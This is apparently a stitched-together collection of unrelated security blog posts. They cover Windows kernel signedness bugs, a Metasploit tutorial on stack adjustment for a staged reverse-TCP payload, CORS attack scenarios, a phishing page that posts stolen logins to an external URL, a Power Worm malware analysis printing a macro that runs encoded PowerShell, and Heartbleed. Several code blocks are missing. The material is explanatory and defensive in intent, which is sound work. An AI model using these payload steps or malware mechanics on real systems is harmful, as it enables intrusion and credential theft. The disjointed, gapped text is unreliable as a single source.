This post is the first in a series discussing several kernel bugs that I found in the Windows kernel. This one is about a bug in the kernel of Windows 7 SP1 (64-bit).
Description:
With the "ThreadInformationClass" parameter set to ThreadIoPriority (0x16), passing certain signed values, e.g. 0xFF3FFF3C or 0xFF3FFFFC, in the variable pointed to by the "ThreadInformation" parameter of the ntdll "ZwSetInformationThread" function can be abused to arbitrarily set certain bit flags of the corresponding "_ETHREAD" structure, e.g. ThreadIoPriority:3, ThreadPagePriority:3, RundownFail:1, or NeedsWorkingSetAging:1.
Bug Type:
This is due to a signedness error in the "nt!NtSetInformationThread" function.
32-Bit kernel:
64-bit kernel:
Impact: 1) The signed value bypasses the check for the "SeIncreaseBasePriorityPrivilege" privilege that is required to set the thread's IO priority to HIGH.
2) An unprivileged thread can use certain calculated signed values to escalate its IO priority and memory priority to maximum values, e.g. raise the IO priority to CRITICAL or the page priority to 7.
3) Certain bit flags of the corresponding "_ETHREAD" structure can also be set, e.g. RundownFail and NeedsWorkingSetAging.
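To make the signedness pattern concrete, here is a minimal Python sketch of the flawed comparison. This is a hypothetical re-creation for illustration only; the actual logic inside nt!NtSetInformationThread differs in its details:

```python
# Sketch of a signedness error of the kind described above (illustrative,
# NOT the real kernel code): the caller's 32-bit value is compared against
# the HIGH I/O priority threshold as a *signed* int, so a large unsigned
# value such as 0xFF3FFF3C is treated as negative and slips past the
# privilege check, while its low bits are still stored into the bitfields.

IO_PRIORITY_HIGH = 3  # threshold above which SeIncreaseBasePriorityPrivilege is needed

def to_signed32(v):
    """Reinterpret an unsigned 32-bit value as a signed int, as C would."""
    return v - 0x100000000 if v & 0x80000000 else v

def privilege_check_bypassed(user_value):
    """The flawed pattern: a signed 'value < HIGH' test skips the privilege
    path for any value with the top bit set."""
    return to_signed32(user_value) < IO_PRIORITY_HIGH

assert privilege_check_bypassed(0xFF3FFF3C)   # negative as signed -> check bypassed
assert not privilege_check_bypassed(3)        # HIGH: privilege required
```

The fix, of course, is to validate the value as an unsigned quantity (or reject out-of-range values) before any privilege decision is made.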
In this post I will show you the second kernel bug that I found in the kernel of Windows 7 SP1 (64-bit). This one is in the "nt!NtSetInformationProcess" function.
Description:
With the "ProcessInformationClass" parameter set to ProcessIoPriority (0x21), passing certain signed values, e.g. 0xFFFFFFFF or 0x8000F129, in the variable pointed to by the "ProcessInformation" parameter of the ntdll "ZwSetInformationProcess" function can be abused to arbitrarily set certain bit flags of the corresponding "_EPROCESS" structure, e.g. DefaultIoPriority (Pos 27), ProcessSelfDelete (Pos 30), or SetTimerResolutionLink (Pos 31).
Bug Type:
This is due to a signedness error in the "nt!NtSetInformationProcess" function.
32-Bit kernel:
64-bit kernel:
Impact: 1) The signed value bypasses the check for the "SeIncreaseBasePriorityPrivilege" privilege that is required to set the process's IO priority to HIGH.
2) The signed value bypasses the check for disallowed values of the process's IO priority; e.g. the bug can be abused to set the process's IO priority to CRITICAL.
3) Setting the "ProcessSelfDelete" flag, which makes the target process non-killable by conventional methods.
4) Setting the "SetTimerResolutionLink" flag, which causes a BSOD (bug check code 0x3B) when the process is terminated, due to a null-pointer dereference.
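The flag positions listed above can be illustrated with a small Python sketch that extracts the relevant bits from a caller-supplied value. The field widths here are assumptions for illustration; consult the _EPROCESS layout of your target build:

```python
# Illustrative sketch (not kernel code): where the caller-controlled bits of
# the ProcessIoPriority value land, using the bit positions from the post.
# DefaultIoPriority is treated as a 3-bit field here, which is an assumption.

def decode_eprocess_flags(value):
    return {
        "DefaultIoPriority":      (value >> 27) & 0x7,  # Pos 27, width assumed
        "ProcessSelfDelete":      (value >> 30) & 0x1,  # Pos 30
        "SetTimerResolutionLink": (value >> 31) & 0x1,  # Pos 31
    }

# 0xFFFFFFFF is -1 as a signed int, so it passes the flawed check and sets
# every one of these bits:
flags = decode_eprocess_flags(0xFFFFFFFF)
assert flags["ProcessSelfDelete"] == 1
assert flags["SetTimerResolutionLink"] == 1

# 0x8000F129 sets bit 31 (SetTimerResolutionLink) in particular:
assert decode_eprocess_flags(0x8000F129)["SetTimerResolutionLink"] == 1
```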
When you are developing an exploit and have very limited space for your payload, you might need to adjust the stack to be able to use staged payloads. The problem with a multi-stage payload is that when the first stage starts to download the second stage, the stack pointer (ESP) might point to a place in memory that is not far enough from the first stage; the second stage could therefore corrupt the code you are executing. Stack adjustment solves this by moving ESP to create more space for the second stage.
There is an easy solution for that which is really straightforward in Metasploit: in your exploit you can set the 'StackAdjustment' attribute of the payload. Our simple example will be the 'attftp_long_filename' exploit with the 'windows/meterpreter/reverse_nonx_tcp' payload. As you can see in [MSF]/msf3/modules/exploits/windows/tftp/attftp_long_filename.rb, it is set to -3500, which subtracts 3500 from ESP just before executing the payload to make enough space for the second stage. In my case the question was how to do the same without Metasploit.
It is actually not that difficult, but I wanted to write about it just for the record. As a PoC I implemented the same exploit in Python using the same payload, but here I will focus on creating the payload. Our goal is a payload with the following structure:
NOPsled + StackAdjustment + shellcode
Let's start from the end.
Shellcode
I used msfpayload to generate the first stage of the payload and save it to a file in raw format. I intentionally didn't encode it at this point because I wanted to encode it together with the StackAdjustment; otherwise it wouldn't fit in the available space. So first let's generate the payload:
Then let's see how to do the StackAdjustment. We will subtract 3500 from ESP to make enough space for the second-stage payload. To do that, the 'sub esp, 0xDAC' instruction (3500 = 0xDAC) has to be executed on the target. We can find out the opcode with Metasploit's nasm_shell.rb tool:
root@bt:/opt/metasploit/msf3# ./tools/nasm_shell.rb
nasm > sub esp, 0xDAC
00000000 81ECAC0D0000 sub esp,0xdac
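If you prefer to build the instruction programmatically, the encoding is simply the two opcode bytes 81 EC (SUB r/m32, imm32 with ModRM selecting ESP) followed by the immediate as a little-endian DWORD. A small Python sketch; the function name is mine:

```python
import struct

def sub_esp(imm):
    """Encode 'sub esp, imm32': opcode 81 /5 with ModRM 0xEC (ESP),
    followed by the 32-bit immediate in little-endian byte order."""
    return b"\x81\xEC" + struct.pack("<I", imm)

# Matches the nasm_shell output above: 81ECAC0D0000
assert sub_esp(0xDAC) == bytes.fromhex("81ECAC0D0000")
```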
The happy marriage with encoding
We need to put this opcode before the msf payload, and of course it has to be encoded because it contains too many 0x00 bytes. To do this I simply catted the opcode and the payload together and piped the result into msfencode:
It was important to encode them together; otherwise the result would not fit in the 223-byte space available in the exploit.
NOPsled
The NOP sled can be easily created with Metasploit. Since the encoded shellcode is 210 bytes and we need to fill 223 bytes, we need to generate a 13-byte NOP sled:
msf > use nop/x86/opty2
msf nop(opty2) > generate -h
Usage: generate [options] length
Generates a NOP sled of a given length.
OPTIONS:
-b <opt> The list of characters to avoid: '\x00\xff'
-h Help banner.
-s <opt> The comma separated list of registers to save.
-t <opt> The output type: ruby, perl, c, or raw.
msf nop(opty2) > generate -b '\x00\xff' 13
buf =
"\x48\x4f\x2d\x25\xbb\x66\xba\x3d\x47\x41\x2f\xd6\xfd"
Putting everything together
In my exploit, I simply concatenated everything together:
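For illustration, here is a minimal Python sketch of that concatenation. The encoded stage is a placeholder for the real 210-byte msfencode output:

```python
# Final payload layout: NOPsled + (StackAdjustment + shellcode, encoded together).
# The opty2 sled bytes are taken from the generate output above; the encoded
# stage below is a PLACEHOLDER standing in for the 210-byte msfencode result.

nop_sled = bytes.fromhex("484f2d25bb66ba3d47412fd6fd")  # 13 bytes from opty2
assert len(nop_sled) == 13

encoded_stage = b"\xcc" * 210  # placeholder for the real encoded blob

payload = nop_sled + encoded_stage
assert len(payload) == 223  # exactly fills the space available in the exploit
```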
The important takeaway here is how to adjust your stack manually if for some reason you can't use Metasploit. It is not difficult; you just need to get your hands a bit dirty with bytes and hex.
I am preparing myself for the Hacktivity conference in Budapest, where I am gonna talk about the security of the Cross-Origin Resource Sharing (CORS). As part of the preparation I will summarise my thoughts in a couple of blog posts.
To start off with I will describe the potential attackers who could try to use CORS in their attacks and I will build an attacker model.
First let’s look at the architecture where CORS is relevant.
CORS: attack environment
As the picture shows, the attacker controls at least one server. This server could of course be in the internal network, but keeping it outside makes the model more general. The target can be either on the intranet or on the Internet, which brings us to the first differentiation point: the attacker's knowledge of the internal network.
1) Knowledge
Internal attacker
Here, an internal attacker means someone who has knowledge of the internal network and services, but not necessarily someone who is inside the internal network. A good example is an ex-employee who knows how to interact with the internal services and has good chances at social engineering, but no longer has access to the internal network.
External attacker
The attacker has no knowledge of the internal network. He can attack services on the Internet to which he has access and against which he is able to craft attacks. He can also probe the internal network to find well-known software (e.g., an open-source project used by the company) which he can analyse offline.
2) Location
Although the attacker could be local, he would then have better options than CORS, so I generally consider a remote attacker. As shown in the architecture, the attacker controls at least one server on the Internet. This server can be his own, in which case he needs to trick the user into visiting it, or it can be a compromised server into which he injects his own code, for instance through an XSS. There are enough vulnerable servers on the Internet, so this is a good option as well.
3) Goal
The goal of the attacker is either to steal information from target servers to which he has no access, or to manipulate those applications in a way that helps him in further attacks. When attacking a service on the Internet, his goal might be to use the target user's authenticated session to steal data. For an internal target, the most important goal is to get any access to the target services at all.
4) Summary
To finish the analysis, using the attributes described above, a potential attack could for example be the following:
I was preparing myself for the Hacktivity conference in Budapest, where I talked about the security of the Cross-Origin Resource Sharing (CORS). As part of the preparation I summarised my thoughts in a couple of blog posts. This is one of them.
As a follow-up to my previous post, I would like to continue with a short analysis of the threats and attack scenarios that could exploit CORS.
There are a few things to consider here. First, CORS is not broken. It is just a feature that can support already existing attacks against other vulnerabilities. From a penetration tester's point of view, CORS is a tool rather than a vulnerability. Second, the most important property of CORS is that it allows a kind of pass through the same-origin policy, with a handful of limitations.
First let’s see the possible attacks from three different perspectives:
Goal of the attack
Target’s location
Type of attack
1) Goal of the attack
To start off, it is worth understanding what kind of goals an attacker can have in mind.
Exploit Cross-Site Request Forgery
The most critical problem an attacker can exploit with CORS is Cross-Site Request Forgery (CSRF). The main reason is that with CORS the attacker can send a complex series of requests to the server, even with session cookies. For instance, before CORS it was somewhat difficult to order a product via CSRF if the order process was multi-stage: the attacker had to submit multiple forms to send the correct requests. With CORS the whole attack can be implemented in JavaScript, and when the user loads the attacker's malicious website, the JavaScript can immediately start sending requests to the target.
Another important aspect is file-upload CSRF. I have already written about that here, so I won't go into details; the point is that before CORS it was not possible to upload files through CSRF because of the 'filename' attribute in the request. Now it is possible, because JavaScript can be used to build the request.
Interact with the internal network
If the user loads the attacker's website from inside the company network, that essentially means the attacker can execute code in the internal network. Of course some pretty strong limitations apply, which I describe in the 'Limitations' part. The attacker can use CORS to explore the network, find well-known services, do simple scanning, etc., or simply attack a known internal service to which he has no access.
2) Target’s location
Another important aspect of attacks is the location of the target. By 'target' we mean the target service: not the user who loads the malicious content, but the service the attacker wants to reach through CORS.
Attacking services on the Internet
This is pretty straightforward. The attacker wants to attack a service that runs publicly on the Internet, but he wants to access restricted content or act in the name of somebody else. He can set up a malicious page, trick the user into loading it, and when the user does, the page can interact with the target service from the user's browser. An (imaginary) example: assume Facebook has a CSRF vulnerability in the share functionality. When the innocent user opens the malicious website, its JavaScript sends a request to Facebook to share something (serving the attacker's goal) on the user's wall. Because of CORS the JavaScript can do that, and with the 'withCredentials' XmlHttpRequest attribute the script can use the authenticated session of the user.
Attacking internal services
In the second case the attacker uses CORS and the user's browser as a pivot point to get access to the internal (company) network. When the user loads the attacker's malicious page, the JavaScript can access services that are not reachable for the attacker from the Internet.
3) Direct vs Indirect
Direct attack against services
I wanted to mention this case because it might seem trivial, yet many people make this mistake because they misunderstand CORS. The problem is that some people consider CORS a kind of authorization mechanism. This comes from the fact that if you send an XmlHttpRequest and the server's CORS policy rejects your origin, the response data will not be available to the JavaScript. What they forget is that the data is still sent to the client; the browser merely decides, based on the response's Access-Control-Allow-* headers, whether to expose it to the JavaScript. This 'protection' fails terribly when the client happens to be a script or a netcat running in a terminal. So by direct attack I mean that the attacker connects directly to the service, not through the browser of some other user.
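This point is easy to demonstrate without a browser. The following Python sketch (hypothetical names, stdlib only) runs a tiny local server that sends a restrictive Access-Control-Allow-Origin header, then reads the response body with a plain HTTP client anyway, showing that the header does nothing server-side:

```python
import http.server
import threading
import urllib.request

class Handler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        body = b"secret data"
        self.send_response(200)
        # The server can name any allowed origin it likes...
        self.send_header("Access-Control-Allow-Origin", "https://only-this-site.example")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # silence request logging

server = http.server.HTTPServer(("127.0.0.1", 0), Handler)
threading.Thread(target=server.serve_forever, daemon=True).start()

# ...but a non-browser client ignores the CORS header entirely and reads the body.
with urllib.request.urlopen(f"http://127.0.0.1:{server.server_port}/") as r:
    data = r.read()
server.shutdown()

assert data == b"secret data"  # CORS enforced only by browsers, not by the wire
```

CORS is enforced purely by the browser on behalf of the user; it is never a substitute for server-side authorization.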
Indirect attacks
Indirect attacks are the traditional client-side attacks, where the malicious code is injected into a website that the user then loads. When the page is loaded, the malicious code attacks the target service from the user's client.
4) Limitations
As mentioned before there are pretty strong limitations when using CORS.
Write only requests
Often, when the service is well configured (or not configured at all), the response will not be readable by the JavaScript. For instance, if the HTTP response has no Access-Control-Allow-Origin header then, although all the data was sent to the client, the JavaScript will not be able to access it. This means requests can be sent to the server and the requested actions will be executed (hence 'write-only'), but the JavaScript cannot read the responses. This stops the attacker from first requesting a form on the website to read the CSRF-protection token and then submitting the form with the token, because he cannot read the response.
withCredentials vs. Access-Control-Allow-Origin: *
This is an interesting limitation which is actually quite smart. If you send a request with credentials and the server responds with Access-Control-Allow-Origin: *, which allows every domain, then the JavaScript will not see the response content. The reason is that 'withCredentials' cannot be used when all origins are allowed. This is the last line of defense against CSRF: if you could read the response, that would break 99% of CSRF protections, because you could first load a page with your credentials, steal the CSRF token, and then perform the CSRF with the token.
5) Summary
Although these different perspectives are somewhat redundant, all the different attack scenarios can be built from combinations of them.
Since this is only a quick analysis, let me know if you have other ideas on the topic.
As I mentioned in the CORS: Attack Scenarios and CORS: Attacker Model posts, I gave a presentation on the security of CORS at the Hacktivity conference in Budapest. The slides can be downloaded from here. If you have any questions on the topic, let me know.
I have been asked to review Joe Stanco’s Build a Network Application with Node video tutorial. So let’s see.
Format
First of all, let's see what you get. This is a Node.js video tutorial; to get a glimpse you can watch the example chapter on YouTube, here. Format-wise, you get a web UI to watch the videos, either online or offline. I was watching it on the train to Vienna, for instance, so it works very well offline. The tutorial is organized into 1-3 minute videos. This is useful if you want to revisit a topic later, but a bit annoying on a first watch: the next video is not loaded automatically, so you always have to minimise the video, click the next chapter, and then click play. Still okay, but it could be better.
Content
I won't copy-paste the TOC; you can find it here. I think the covered topics are pretty good if you are a beginner in Node. The videos are also quite good: very few slides, mostly code, terminal, and browser, which fits my taste :). However, the code is not written live but copy-pasted, which makes it a bit harder to follow; I had to pause the video often to have time to read through the inserted code. It is at least better than if it were too slow and you had to wait for the video. Another annoying thing in the UI is that you cannot pause the video with the spacebar (which I think should be the default for every media player).
Regarding the topics, as a rule of thumb you could say that for each topic the course explains how to install and configure it, and one example is shown. If you already have that experience with any of the topics, you probably won't learn anything new.
The narrator (to be honest, I don't know whether it is Joe Stanco or not) speaks clearly. The script of the course is clearly well prepared, which has advantages and disadvantages. The good part is that it is really clear and exact; the bad part is that it lacks fun and humour, and most things are defined exactly once. That means if you don't understand something from one sentence, you won't get another chance. But it also makes the course shorter and not redundant.
Although the course doesn't include exercises, the code of the examples is available, so you can try them out and play with them.
Security
Since I work in security, I must take that into consideration as well. The course doesn't talk about security at all, which makes me a bit sad. You could say this is not an advanced course and IT security is more complicated than that; in my opinion, however, security should be discussed at every level, at least so that the viewer is aware of the threats and knows that security has to be dealt with. Most people who take this tutorial will probably start writing applications without ever taking an advanced course where security is discussed, so they will keep writing insecure applications until they get hacked or somebody tells them to take security seriously. That is why I think no introductory course should exist without mentioning security.
Pros
Topics are good.
Example code is available.
A faster way to get to know Node than reading a book.
Script is well written.
More code, less slides.
Explanations are mostly clear.
Cons
No automatic jump to next video.
No pause on spacebar.
Everything explained only once.
No exercises.
SECURITY IS NOT DISCUSSED.
Summary
I think this is a good course if you already know JavaScript but you are new to Node.js. Have fun with it if you decide to take it.
In this post, I will share a tiny tool I wrote to discover all occurrences of TimeDateStamps in a PE executable. The tool simply traverses the PE header, specifically the following structures/fields:
1) The "TimeDateStamp" field of the "_IMAGE_FILE_HEADER" structure.
This is the most notorious field that is always a target for both malware authors and forensic guys.
N.B. Certain versions of the Delphi linker always emit a fixed TimeDateStamp of 0x2A425E19 (Sat Jun 20 01:22:17 1992). In that case you should not rely on this field and should keep looking at the other fields.
2) The "TimeDateStamp" field of the "_IMAGE_EXPORT_DIRECTORY" structure.
It is usually the same as, or very close to, the "TimeDateStamp" field of the "_IMAGE_FILE_HEADER" structure.
N.B. Not all linkers fill this field, but Microsoft Visual Studio linkers do fill it for both DLL's and EXE's.
3) The "TimeDateStamp" field of the "_IMAGE_IMPORT_DESCRIPTOR" structure.
Despite what the name implies, this field is not much use for determining when the executable was built: it is -1 if the executable/DLL is bound (see #8) and zero if not. So it is not implemented in my tool.
4) The "TimeDateStamp" field of the "_IMAGE_RESOURCE_DIRECTORY" structure.
Microsoft Visual Studio linkers usually don't set it (I tested linker versions 6.0, 8.0, 9.0, and 10.0).
Borland C and Delphi set this field for the main _IMAGE_RESOURCE_DIRECTORY and its subdirectories.
Sometimes spoofers forget to forge this field for subdirectories.
5) The "TimeDateStamp" of the "_IMAGE_DEBUG_DIRECTORY" structures.
Microsoft Visual Studio linkers that emit debug info into the final PE always set this field. Spoofers may forge the field in the first "_IMAGE_DEBUG_DIRECTORY" structure and forget the following ones.
N.B. The debug info pointed to by the Debug data directory is an array of "_IMAGE_DEBUG_DIRECTORY" structures, each representing debug info of a different type, e.g. COFF, CodeView, etc.
6) If an "_IMAGE_DEBUG_DIRECTORY" has its "Type" field set to 0x2 (IMAGE_DEBUG_TYPE_CODEVIEW), then by following the "PointerToRawData" field we can find another occurrence of a TimeDateStamp (only if the PDB format is PDB 2.0, i.e. when the "Signature" field is set to "NB10").
7) The "TimeDateStamp" field of the "_IMAGE_LOAD_CONFIG_DIRECTORY" structure.
I have not seen it being used before. However, it is implemented in the tool.
8) The "TimeDateStamp" field of the "_IMAGE_BOUND_IMPORT_DESCRIPTOR" structures.
It is the TimeDateStamp of the DLL that the executable is bound to. We can't use this field to determine when the executable was built, but we can use it to determine on which Windows version/service pack the file was built/bound. It is not implemented in the tool.
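To illustrate where the first of these stamps lives, here is a minimal Python sketch that walks e_lfanew to the IMAGE_FILE_HEADER and reads its TimeDateStamp. It is tested against a synthetic header carrying the fixed Delphi stamp mentioned in #1; the function name is mine, not from the tool:

```python
import struct

def pe_timedatestamp(data):
    """Read IMAGE_FILE_HEADER.TimeDateStamp: e_lfanew at offset 0x3C points
    to the 'PE\\0\\0' signature; the file header follows immediately, with
    Machine(2) and NumberOfSections(2) before the TimeDateStamp(4)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    return struct.unpack_from("<I", data, e_lfanew + 8)[0]

# Synthetic header carrying the fixed Delphi stamp 0x2A425E19:
hdr = bytearray(0x100)
hdr[0:2] = b"MZ"
struct.pack_into("<I", hdr, 0x3C, 0x80)       # e_lfanew -> 0x80
hdr[0x80:0x84] = b"PE\x00\x00"                # PE signature
struct.pack_into("<I", hdr, 0x80 + 8, 0x2A425E19)  # TimeDateStamp
assert pe_timedatestamp(bytes(hdr)) == 0x2A425E19
```

The other stamps (export, resource, debug, load-config, bound-import directories) are found the same way, by following the corresponding data-directory RVAs.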
The tool has a very simple command line. See below.
You can download the tool from here. For any bugs or suggestions, please don't hesitate to leave me a comment or contact me @waleedassar.
The war between hackers is no longer individual versus individual; it has grown into nation versus nation. To obtain another country's confidential documents, intelligence, or personal data, a state will try every means: breaking into accounts, sending malicious e-mail, phishing for passwords, and so on. What can we, the potential victims, do? Google's official advice is to strengthen password security, watch login IP addresses, keep your software updated, and enable two-step verification. Good security awareness, of course, matters even more.
As it happens, I received a simple case today that is worth sharing.
Sitting in the inbox was an e-mail that looked like it came from a foreign customer, titled "Company Profile / Order Details". The content looked perfectly normal, and the company's basic profile was included as an attachment.
Opening the attachment, you first see a JavaScript alert pop up, and then you are redirected to a Google login page.
Look closely: is this login page real? Did you notice that the checkmark in front of "Stay signed in" has turned into an empty box? The address in the browser is also a local address. Think about it: why would clicking an attachment take you to a Google login screen?
Looking at the source, we find that the form's action has been changed to a strange URL that is clearly a malicious site. The rest of the page was scraped from Google's real login page and modified, so with a moment of inattention you would mistake it for the real Google login screen and type in your username and password.
An excerpt of the code:
See it? The form's action field has been replaced with "http://cantonfair.a78.org/yahoo/post.php". That page receives the credentials the victim types and then automatically redirects to the real Google login page. The attacker harvests every victim's credentials directly from the a78.org site.
Don't casually open attachments: attachments often carry malware, executables, malicious documents, or phishing pages, so never open them carelessly. You can open document attachments with Google Docs to keep malicious documents from attacking Adobe PDF Reader, Microsoft Office, and the like. Attackers also frequently send malware in a password-protected archive with the password in the mail body, to evade antivirus detection, so stay alert.
On March 27, 2014, Trend Micro revealed the so-called "Power Worm" PowerShell-based malware that is actively being used in the wild. With so few publicly reported instances of PowerShell malware in existence, I was excited to get my hands on this most recent strain of PowerShell-based malware. Unable to track it down on my own, I reached out to the security and PowerShell communities. It was with great relief that my friend Lee Holmes – PowerShell developer extraordinaire and author of the Windows PowerShell Cookbook – kindly provided me with all of the samples described in the Trend Micro post.
While the Trend Micro post was thorough in its coverage of the broader capabilities of the malware, it did not provide an analysis of the implementation, which, as a PowerShell enthusiast and malware analyst, I was very interested in. That said, what follows is my analysis of the mechanics of the Office-document-infecting malware. Since there were multiple payloads associated with "Power Worm," I decided to focus on the X97M_CRIGENT.A payload – a malicious Excel spreadsheet.
The targeted Excel macro used in the "Power Worm" campaign
The spreadsheet contains the following macro:
Private Sub Workbook_Open()
    b = "JwBDAEkREDACTEDREDACTED" _
      & "QA7ACcAcgREDACTEDREDACTED" _
      & "BzACgAKQAREDACTEDREDACTED" _
      & "jAGUAIAAtREDACTEDREDACTED" _
      & "ACAAUwB5AREDACTEDREDACTED" _
      & "GcALgBpAGREDACTEDREDACTED" _
      & "4AIAAtAGEREDACTEDREDACTED" _
      & "AdAAuAHAAREDACTEDREDACTED"
    Set a = CreateObject("WScript.Shell")
    a.Run "powershell.exe" & " -noexit -encodedcommand " & b, 0, False
End Sub
People have asked, “Wouldn’t the PowerShell execution policy potentially mitigate this attack?” No. First of all, the execution policy should not be viewed as a security mitigation considering PowerShell itself provides the mechanism to bypass it. Second, the execution policy is not honored when a Base64 encoded command is provided to the ‘-EncodedCommand’ parameter. Malware authors know this and will never run into a situation where the execution policy is the reason their malicious PowerShell code was prevented from executing. Having macros disabled by default prevents the initial infection, but all it takes is a naïve victim to click a single button to enable macros.
The ‘Workbook_Open’ function will execute automatically upon opening an Excel spreadsheet (assuming macros are allowed to execute). After decoding the Base64-encoded PowerShell command, you will be presented with an obfuscated mess consisting of the following:
The payload is a single line of semicolon delimited PowerShell commands.
Junk strings that have no impact on the script are inserted between each command.
All variables and function names are randomly generated and have no logical meaning.
Lastly, some functions used in the script are not implemented until a subsequent payload is downloaded from the command and control (C2) server.
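Decoding the macro's Base64 blob is the first analysis step. PowerShell's -EncodedCommand parameter takes Base64 of the UTF-16LE command text (not plain ASCII), so a small Python helper (names are mine) round-trips it like this:

```python
import base64

def encode_command(cmd):
    """Produce a -EncodedCommand argument: Base64 over UTF-16LE text."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(b64):
    """Reverse it, as an analyst would when unpacking a malicious macro."""
    return base64.b64decode(b64).decode("utf-16-le")

# A harmless example command round-trips cleanly:
sample = encode_command("Write-Output 'hello'")
assert decode_encoded_command(sample) == "Write-Output 'hello'"
```

Decoding the real sample's blob this way yields the obfuscated one-liner described above.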
I rewrote all of the “Power Worm” malware (redacting key portions) that I was able to obtain so that those interested don’t have to be bogged down with difficult to understand obfuscated code. I also created a PowerWorm GitHub repo where you will find the following code:
The rewritten X97M_CRIGENT.A PowerShell payloads (5 parts in total)
Test-PowerWormInfection – Detects and removes a “Power Worm” infection
Get-ExcelMacro – Outputs and removes Excel spreadsheet macros
Get-WordMacro – Outputs and removes Word document macros
As soon as the macro executes and launches PowerShell, the following code is executed:
Suppress error messages.
Obtain the machine GUID with WMI. This unique value specific to your system is used throughout the malware as a directory name to store downloaded files, registry key names where additional payload are persisted, and as a unique identifier for the C2 server.
Next, if the malware is already persisted in the registry, it doesn't bother running the payload again; it will execute again at the next reboot.
Define a function to resolve DNS TXT records and download and decompress a zip file located at the URI in the resolved TXT record. Both Tor and Polipo are downloaded via this function.
Mark the downloaded file directory as hidden.
The next portion of the payload executes Tor and Polipo (a requirement for communicating with the C2 server) and downloads and executes the next stage of the attack:
For those unfamiliar with common malware techniques, what should be worrisome about the fact that additional PowerShell code is downloaded and executed is that the malware authors have complete control over the downloaded content. The analysis that follows describes the instance of the malware that I downloaded. The malware authors could very well change the payload at any time.
The downloaded payload starts by persisting three additional Base64-encoded payloads to the registry.
The Trend Micro article neglected to mention the two payloads saved in the registry at the following locations:
$EncodedPayload1 and $EncodedPayload2 are essentially equivalent to the initial payload included in the Excel macro – they serve to reinfect the system and download/execute any additional payloads. $EncodedPayload3 contains all the logic to infect Office documents.
The malware then collects information about the compromised system and uploads it to the C2 server.
Finally, the Office document infection functions are called and if an additional payload is available, it is executed. I was unable to retrieve the additional payload during my analysis.
The Office document infection payload implements the following functions:
Start-NewDriveInfection – Registers a WMI event that detects when a new drive is added (e.g. USB thumb drive) and infects all Office documents present on the drive
Invoke-OfficeDocInfection – Infects all Office documents on the drive letter specified
Start-ExistingDriveInfection – Registers a FileSystemWatcher event to detect and infect newly created Office documents
Set-OfficeDocPayload – Adds a macro to the specified Office document
New-MaliciousMacroPayload – Generates a macro based upon one of the payloads present in the registry
Set-ExcelDocumentMacroPayload – Infects an Excel spreadsheet
Set-WordDocumentMacroPayload – Infects a Word document
In order to programmatically create/modify/remove Excel and Word macros, macro security must be disabled in the registry with these commands:
After the registry values are set, you will no longer be prompted to enable macros. They will execute automatically without your knowledge. Also, be mindful that if a macro is present in an Office document and you attempt to analyze it with the Word.Application and Excel.Application COM objects, the macro security settings are not honored and the macro will execute without your permission. Before opening an Office document with the COM objects, you must explicitly disallow the execution of macros by setting the ‘AutomationSecurity’ property to ‘msoAutomationSecurityForceDisable’.
The Word document infector is implemented as follows:
What’s interesting is that once the macro is written to the Word document, it is downgraded to a ‘macro-enabled’ .doc file.
Once a document or spreadsheet is infected, it will download and execute another PowerShell payload. I was unable to successfully download any additional payloads during my analysis. Either I was not emulating C2 communication properly or the payload was not made available at the time.
In the end, I was rather impressed by the effectiveness with which the PowerShell payloads infected Office documents. The true power of this malware won't be seen, though, until additional malicious payloads can be downloaded from the C2 server.
Should you become the victim of a “Power Worm” infection or any malicious Office document for that matter, I’ve provided tools to detect and remove “Power Worm” and Word/Excel macros. You can download these tools from my Github repo.
A missing bounds check in the handling of the TLS heartbeat extension can be
used to reveal up to 64k of memory to a connected client or server.
Only 1.0.1 and 1.0.2-beta releases of OpenSSL are affected including
1.0.1f and 1.0.2-beta1.
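The flaw can be illustrated in a few lines of Python. This is a simulation of the missing bounds check, not OpenSSL code: the handler echoes back as many bytes as the peer *claims* the heartbeat payload contains, never checking the claim against the payload actually received, so adjacent memory leaks.

```python
def heartbeat_response(process_memory, payload_offset, claimed_length):
    """Flawed handler (simulation): copies claimed_length bytes starting at
    the payload without checking claimed_length against the real payload size,
    mirroring the missing bounds check in the Heartbleed bug."""
    return process_memory[payload_offset:payload_offset + claimed_length]

# 4-byte payload followed by unrelated secrets living next to it in memory:
memory = b"PING" + b"user=admin;password=hunter2;"

assert heartbeat_response(memory, 0, 4) == b"PING"  # honest request: echo only
leak = heartbeat_response(memory, 0, 32)            # lie about the length...
assert b"hunter2" in leak                           # ...and adjacent memory leaks
```

The fix in OpenSSL was exactly the missing comparison: discard the heartbeat if the claimed payload length exceeds what actually arrived.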
What kind of site is a prime target? Sites with member accounts above all: webmail, social networks, and so on. Many businesses should take note; for example, the world's largest social network Facebook, SlideShare, well-known Taiwanese telecom sites, social platforms, online banking, and NAS devices all fall within the scope of this wave of attacks. Without a prompt fix, once more effective exploit code appears, the bleeding will really begin.
Summary
Even a library as old and as critical as OpenSSL can make this kind of basic C programming mistake. Old code surely harbors plenty of lingering problems, and without a thorough audit, heart-bleeding incidents like this one will keep recurring. Everyone, stop the bleeding quickly!
The U.S. National Security Agency knew for at least two years about a flaw in the way that many websites send sensitive information, now dubbed the Heartbleed bug, and regularly used it to gather critical intelligence, two people familiar with the matter said.
The situation is especially serious for vendor appliances, because every device running the same version is affected, and until the vendor releases an update you can only wait passively. Devices no longer under a maintenance contract must either renew with the vendor to get updates, or hope the vendor will provide the patch directly. Services such as VPN servers deserve particular attention: if an attacker captures credentials, it is as if the gates were wide open, and they can log straight into the corporate intranet with your account. Be careful.
How fast did each system patch?
Quoting my good friend Ant's article: the speed with which each operating system and website shipped updates reflects how seriously a company takes security and how efficient its emergency response to security incidents is, and it can also serve as a basis for choosing systems, websites, and vendors.
Yesterday, I gave two presentations at the PowerShell Summit. The first presentation was on advanced eventing techniques in PowerShell and the second was on using PowerShell as a reverse engineering tool. As it turns out, PowerShell is an awesome tool for automating the analysis of .NET malware samples. I’ve included the slides for each talk. Additionally, you can download all of my demo code here. Just be mindful that this is all PoC code so it’s not in a well-polished state. Note: I provided the MD5 hashes of the malware samples but I won’t be providing a direct download link for them. Enjoy!
